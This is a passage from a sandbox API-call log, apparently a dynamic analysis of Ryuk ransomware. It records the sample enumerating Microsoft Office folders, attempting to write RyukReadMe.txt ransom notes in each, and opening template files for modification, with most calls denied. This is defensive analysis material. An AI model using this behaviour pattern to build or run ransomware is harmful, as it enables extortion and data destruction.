hTemplateFile=0x0) returned 0xffffffffffffffff [0138.106] GetLastError () returned 0x5 [0138.106] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0138.107] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.107] FindClose (in: hFindFile=0x3bd420 | out: hFindFile=0x3bd420) returned 1 [0138.107] SetLastError (dwErrCode=0x0) [0138.107] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.108] GetLastError () returned 0x5 [0138.108] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0138.108] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.108] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Stationery\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2d00 [0138.108] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0138.108] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0138.108] SetLastError (dwErrCode=0x0) [0138.108] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Stationery\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\stationery\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.108] GetLastError () returned 0x5 [0138.108] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0138.108] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.108] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Stationery\\1033\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2d60 [0138.109] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.109] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.113] FindClose (in: hFindFile=0x3a2d60 | out: hFindFile=0x3a2d60) returned 1 [0138.113] SetLastError (dwErrCode=0x0) [0138.113] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Stationery\\1033\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.116] GetLastError () returned 0x5 [0138.116] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0138.116] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.116] FindClose (in: hFindFile=0x3a2d00 | out: hFindFile=0x3a2d00) returned 1 [0138.117] SetLastError (dwErrCode=0x0) [0138.117] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Stationery\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\stationery\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.117] GetLastError () returned 0x5 [0138.117] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0138.117] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.117] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2d00 [0138.118] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0138.118] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0138.118] SetLastError (dwErrCode=0x0) [0138.118] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\templates\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.118] GetLastError () returned 0x5 [0138.118] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0138.118] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.118] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2d60 [0138.120] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.121] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.121] SetLastError (dwErrCode=0x0) [0138.121] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.122] GetLastError () returned 0x5 [0138.122] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0138.122] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.122] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2dc0 [0138.123] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.123] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.127] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\DataType\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2e20 [0138.128] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.128] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.131] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0138.131] SetLastError (dwErrCode=0x0) [0138.131] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\DataType\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\datatype\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.134] GetLastError () returned 0x5 [0138.134] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.134] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.134] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.135] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2e20 [0138.137] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.137] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.140] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0138.140] SetLastError (dwErrCode=0x0) [0138.141] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\Part\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\part\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.143] GetLastError () returned 0x5 [0138.143] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.143] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.143] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.144] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\WSS\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2e20 [0138.145] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.145] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.145] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0138.145] SetLastError (dwErrCode=0x0) [0138.145] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\WSS\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\wss\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.145] GetLastError () returned 0x5 [0138.145] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.145] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.145] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0138.145] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0138.145] SetLastError (dwErrCode=0x0) [0138.145] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\Access\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\access\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.145] GetLastError () returned 0x5 [0138.145] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0138.146] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.146] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.159] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\FAX\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2dc0 [0138.160] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.160] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.162] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0138.162] SetLastError (dwErrCode=0x0) [0138.162] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\FAX\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\fax\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.165] GetLastError () returned 0x5 [0138.165] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0138.165] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.165] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.166] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2dc0 [0138.166] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.166] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.166] SetLastError (dwErrCode=0x0) [0138.166] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\onenote\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.166] GetLastError () returned 0x5 [0138.166] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.166] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.166] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\14\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2e20 [0138.167] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.167] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.167] SetLastError (dwErrCode=0x0) [0138.167] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\14\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\onenote\\14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.167] GetLastError () returned 0x5 [0138.167] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0138.167] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.167] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\14\\Notebook Templates\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2e80 [0138.168] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.168] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.168] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0138.168] SetLastError (dwErrCode=0x0) [0138.168] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\14\\Notebook Templates\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\onenote\\14\\notebook templates\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.168] GetLastError () returned 0x5 [0138.168] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0138.168] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.168] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.168] SetLastError (dwErrCode=0x0) [0138.168] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\14\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\onenote\\14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.168] GetLastError () returned 0x5 [0138.168] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0138.168] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.168] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\14\\Stationery\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2e80 [0138.169] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.169] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.169] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.169] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\14\\Stationery\\ACADEMIC.ONE", dwFileAttributes=0x80) returned 0 [0138.170] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.170] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.171] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.171] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.171] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\14\\Stationery\\BLANK.ONE", dwFileAttributes=0x80) returned 0 [0138.171] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\14\\Stationery\\BLANK.ONE" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\onenote\\14\\stationery\\blank.one"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.171] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.171] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.171] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.171] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.171] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\14\\Stationery\\BUSINESS.ONE", dwFileAttributes=0x80) returned 0 [0138.171] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\14\\Stationery\\BUSINESS.ONE" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\onenote\\14\\stationery\\business.one"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.171] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.172] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.172] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.172] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.172] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\14\\Stationery\\DESIGNER.ONE", dwFileAttributes=0x80) returned 0 [0138.172] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\14\\Stationery\\DESIGNER.ONE" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\onenote\\14\\stationery\\designer.one"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.172] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.172] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.172] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.172] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.172] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\14\\Stationery\\PLANNERS.ONE", dwFileAttributes=0x80) returned 0 [0138.172] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\14\\Stationery\\PLANNERS.ONE" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\onenote\\14\\stationery\\planners.one"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.173] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.173] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.173] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0138.173] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0138.173] SetLastError (dwErrCode=0x0) [0138.173] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\14\\Stationery\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\onenote\\14\\stationery\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.173] GetLastError () returned 0x5 [0138.173] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0138.173] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.173] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0138.173] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0138.173] SetLastError (dwErrCode=0x0) [0138.173] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\14\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\onenote\\14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.173] GetLastError () returned 0x5 [0138.173] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.173] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.173] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0138.173] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0138.174] SetLastError (dwErrCode=0x0) [0138.174] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\ONENOTE\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\onenote\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.174] GetLastError () returned 0x5 [0138.174] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0138.174] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.174] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.174] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.174] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\OrielLetter.Dotx", dwFileAttributes=0x80) returned 0 [0138.174] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Templates\\1033\\OrielLetter.Dotx" (normalized: "c:\\program files\\microsoft office\\templates\\1033\\orielletter.dotx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.174] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.174] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 